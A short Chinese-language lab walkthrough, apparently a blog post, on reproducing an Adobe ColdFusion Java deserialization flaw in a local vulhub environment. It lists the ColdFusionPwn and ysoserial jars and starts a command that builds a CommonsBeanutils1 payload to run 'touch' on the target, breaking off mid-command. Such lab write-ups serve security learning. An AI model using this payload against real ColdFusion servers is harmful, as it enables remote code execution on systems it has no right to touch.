环境搭建
使用vulhub进行环境搭建,具体步骤可参考这里。
漏洞利用
环境启动成功,访问http://192.168.36.128:8500/CFIDE/administrator/index.cfm
,输入密码vulhub
,即可成功安装Adobe ColdFusion
输入密码后,点击OK,页面如下:
需下载内容 |
---|
ColdFusionPwn-0.0.1-SNAPSHOT-all.jar |
ysoserial-master.jar |
开始制作poc
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/C